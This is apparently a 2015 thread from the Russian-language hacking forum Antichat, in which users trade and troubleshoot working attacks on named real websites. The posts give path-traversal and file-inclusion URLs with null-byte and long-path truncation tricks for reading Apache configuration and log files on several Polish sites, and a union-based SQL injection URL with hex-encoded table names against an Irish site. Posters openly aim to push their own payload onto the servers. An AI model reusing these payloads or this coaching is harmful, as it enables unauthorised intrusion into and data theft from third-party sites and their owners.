ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
02.06.2015, 11:02
|
|
Guest
Сообщений: n/a
Провел на форуме:
238786
Репутация:
40
|
|
Сообщение от yarbabin
yarbabin said:
↑
для начала идем на сайт вордпресса скачиваем исходники:
https://wordpress.org/plugins/jquery...cal-mega-menu/
открываем skin.php и видим на 31 строке:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]$str[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]str_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"."[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$str[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$str[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]str_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"/"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$str[/COLOR][COLOR="#007700"]);[/COLOR][/COLOR]
т. е. за пределы директории выйти не получится. без этого бы могла быть читалка файлов Спасибо, так и думал. Вас не узнать с новым ником)
|
|
|
|
02.06.2015, 23:29
|
|
Guest
Сообщений: n/a
Провел на форуме:
35200
Репутация:
6
|
|
Код:
Code:
http://bezpiecznykonin.konet.pl/index.php?d=../../../../../../../../../../../../../../../../../../../../../../etc/httpd/conf/httpd.conf/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
Тут я насчитал 18 виртуальных хостов.
Пробую читать логи тут:/etc/httpd/logs/*
Не читается... что нибудь можно сделать?
Код:
Code:
http://jar-com.pl/index.php?dzial=procesory_amd&link=../../../../../../../../../../../../../../../../../../../../../../etc/httpd/conf/httpd.conf�&sort=cena_netto
Аналогично, но тут 31 сайт
Код:
Code:
http://aki.com.pl/download.php?format=pdf&id=../../../../../../../../../../../../../../../../../../../../../../etc/httpd/conf/httpd.conf�
58 сайтов
Код:
Code:
http://ktmiap.mech.pg.gda.pl
инклуд в куках
language=polish/../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/httpd/ssl.conf%00
Помогите пож. хотя бы с 1 сайтом разобраться |
|
|
|
03.06.2015, 13:19
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033
Репутация:
8
|
|
Сообщение от huntercs16
huntercs16 said:
↑
Код:
Code:
http://bezpiecznykonin.konet.pl/index.php?d=../../../../../../../../../../../../../../../../../../../../../../etc/httpd/conf/httpd.conf/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
Тут я насчитал 18 виртуальных хостов.
Пробую читать логи тут:/etc/httpd/logs/*
Не читается... что нибудь можно сделать?
Код:
Code:
http://jar-com.pl/index.php?dzial=procesory_amd&link=../../../../../../../../../../../../../../../../../../../../../../etc/httpd/conf/httpd.conf�&sort=cena_netto
Аналогично, но тут 31 сайт
Код:
Code:
http://aki.com.pl/download.php?format=pdf&id=../../../../../../../../../../../../../../../../../../../../../../etc/httpd/conf/httpd.conf�
58 сайтов
Код:
Code:
http://ktmiap.mech.pg.gda.pl
инклуд в куках
language=polish/../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/httpd/ssl.conf%00
Помогите пож. хотя бы с 1 сайтом разобраться Омг. А зачем вы их считаете? Цель - найти вектор для проброса своего payload, а не для переклички хостов.
|
|
|
03.06.2015, 18:03
|
|
Guest
Сообщений: n/a
Провел на форуме:
35200
Репутация:
6
|
|
Сообщение от BigBear
BigBear said:
↑
Омг. А зачем вы их считаете? Цель - найти вектор для проброса своего payload, а не для переклички хостов. Серваки же интереснее ковырять людям)
Еще вопрос:
Еррор лог без реферера. Как можно обойти его отсутствие?
Тоже самое
|
|
|
|
03.06.2015, 20:22
|
|
Guest
Сообщений: n/a
Провел на форуме:
5534
Репутация:
0
|
|
|
|
|
|
03.06.2015, 20:27
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
что не идет дальше? все как обычно
|
|
|
|
03.06.2015, 20:36
|
|
Guest
Сообщений: n/a
Провел на форуме:
5534
Репутация:
0
|
|
Сообщение от yarbabin
yarbabin said:
↑
что не идет дальше? все как обычно не получается извлечь название столбцов, выдает ошибку. Вы уж извините, я новичок.
|
|
|
|
03.06.2015, 20:38
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Сообщение от huntercs16
huntercs16 said:
↑
Серваки же интереснее ковырять людям)
Еще вопрос:
Еррор лог без реферера. Как можно обойти его отсутствие?
Тоже самое в первом случае все на месте. во втором - посмотрите на дату логов. там еще и винда, нужны другие трюки
.SpoilerTarget" type="button">Spoiler: phpinfo
|
|
|
|
03.06.2015, 20:41
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Сообщение от Merl0k
Merl0k said:
↑
не получается извлечь название столбцов, выдает ошибку. Вы уж извините, я новичок. у вас фильтруются кавычки, значит при указании таблицы нужно использовать hex или char. перечитайте статью
Код:
Code:
http://www.tidytowns.ie/interior.php?id=-2+union+select+1,2,column_name,4,5,6,7+from+information_schema.columns+where+table_name=0x726573756c7473+limit+0,1--+
в данном случае 726573756c7473 это results в hex
|
|
|
|
03.06.2015, 21:00
|
|
Guest
Сообщений: n/a
Провел на форуме:
35200
Репутация:
6
|
|
Сообщение от yarbabin
yarbabin said:
↑
в первом случае все на месте. во втором - посмотрите на дату логов. там еще и винда, нужны другие трюки
Spoiler: phpinfo
Код:
Code:
http://esn.po.opole.pl/index2.php?dir=photo&id=../../../../../../../../../../../../../../../../../../../../../../var/log/apache2/error_log/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.&name=img_0160.jpg&site=photo_zoom
Вот тут реально нестандартный еррор лог. Что это?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
